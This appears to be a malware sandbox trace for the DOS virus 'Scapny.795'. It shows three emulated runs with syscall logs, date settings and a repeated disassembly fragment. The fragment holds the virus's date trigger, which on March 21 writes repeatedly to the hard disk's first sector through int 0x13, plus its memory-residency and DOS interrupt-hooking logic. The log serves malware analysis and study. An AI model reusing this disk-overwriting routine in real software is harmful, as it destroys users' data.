Sample viewer

vx.netlux.org/Virus.DOS.Scapny.795


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:48:41.659567708Z 72 PC: 12c42 | Allocate memory
2018-12-17T22:48:41.662996156Z 42 PC: 12c68 | Get date
0x12c68: cmp dx, 0x315
0x12c6c: jne 0x12c80
0x12c6e: mov cx, 3
0x12c71: push cx
0x12c72: mov ax, 0x301
0x12c75: mov dx, 0x80
0x12c78: mov cx, 1
0x12c7b: int 0x13
0x12c7d: pop cx
0x12c7e: loop 0x12c71
0x12c80: xor ax, ax
0x12c82: mov ds, ax
0x12c84: mov bx, 0x184
0x12c87: cmp word ptr [bx], 0x13
0x12c8a: je 0x12cd2
0x12c8c: mov word ptr [bx], 0x13
0x12c90: mov bx, 0x80
0x12c93: sub word ptr es:[2], bx
0x12c98: mov ax, es
0x12c9a: dec ax
2018-12-17T22:48:41.665313935Z 53 PC: 12cc3 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:48:41.666296488Z 37 PC: 12cd2 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:48:41.668192838Z 9 PC: 12b33 | Display string (Could not find end pointer)
2018-12-17T22:48:41.679482266Z 76 PC: 12b37 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9634,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:21.843384291Z 72 PC: 12c42 | Allocate memory
2018-12-25T12:23:21.845823775Z 42 PC: 12c68 | Get date
0x12c68: cmp dx, 0x315
0x12c6c: jne 0x12c80
0x12c6e: mov cx, 3
0x12c71: push cx
0x12c72: mov ax, 0x301
0x12c75: mov dx, 0x80
0x12c78: mov cx, 1
0x12c7b: int 0x13
0x12c7d: pop cx
0x12c7e: loop 0x12c71
0x12c80: xor ax, ax
0x12c82: mov ds, ax
0x12c84: mov bx, 0x184
0x12c87: cmp word ptr [bx], 0x13
0x12c8a: je 0x12cd2
0x12c8c: mov word ptr [bx], 0x13
0x12c90: mov bx, 0x80
0x12c93: sub word ptr es:[2], bx
0x12c98: mov ax, es
0x12c9a: dec ax
2018-12-25T12:23:21.848754823Z 53 PC: 12cc3 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:23:21.850253574Z 37 PC: 12cd2 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:23:21.851829852Z 9 PC: 12b33 | Display string (Could not find end pointer)
2018-12-25T12:23:21.865464097Z 76 PC: 12b37 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":21,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9634,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:22.304454719Z 72 PC: 12c42 | Allocate memory
2018-12-25T12:23:22.308105932Z 42 PC: 12c68 | Get date
0x12c68: cmp dx, 0x315
0x12c6c: jne 0x12c80
0x12c6e: mov cx, 3
0x12c71: push cx
0x12c72: mov ax, 0x301
0x12c75: mov dx, 0x80
0x12c78: mov cx, 1
0x12c7b: int 0x13
0x12c7d: pop cx
0x12c7e: loop 0x12c71
0x12c80: xor ax, ax
0x12c82: mov ds, ax
0x12c84: mov bx, 0x184
0x12c87: cmp word ptr [bx], 0x13
0x12c8a: je 0x12cd2
0x12c8c: mov word ptr [bx], 0x13
0x12c90: mov bx, 0x80
0x12c93: sub word ptr es:[2], bx
0x12c98: mov ax, es
0x12c9a: dec ax
2018-12-25T12:23:22.640996619Z 53 PC: 12cc3 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:23:22.642770344Z 37 PC: 12cd2 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:23:22.644623661Z 9 PC: 12b33 | Display string (Could not find end pointer)
2018-12-25T12:23:22.658013133Z 76 PC: 12b37 | Terminate with return code (Return code = '36')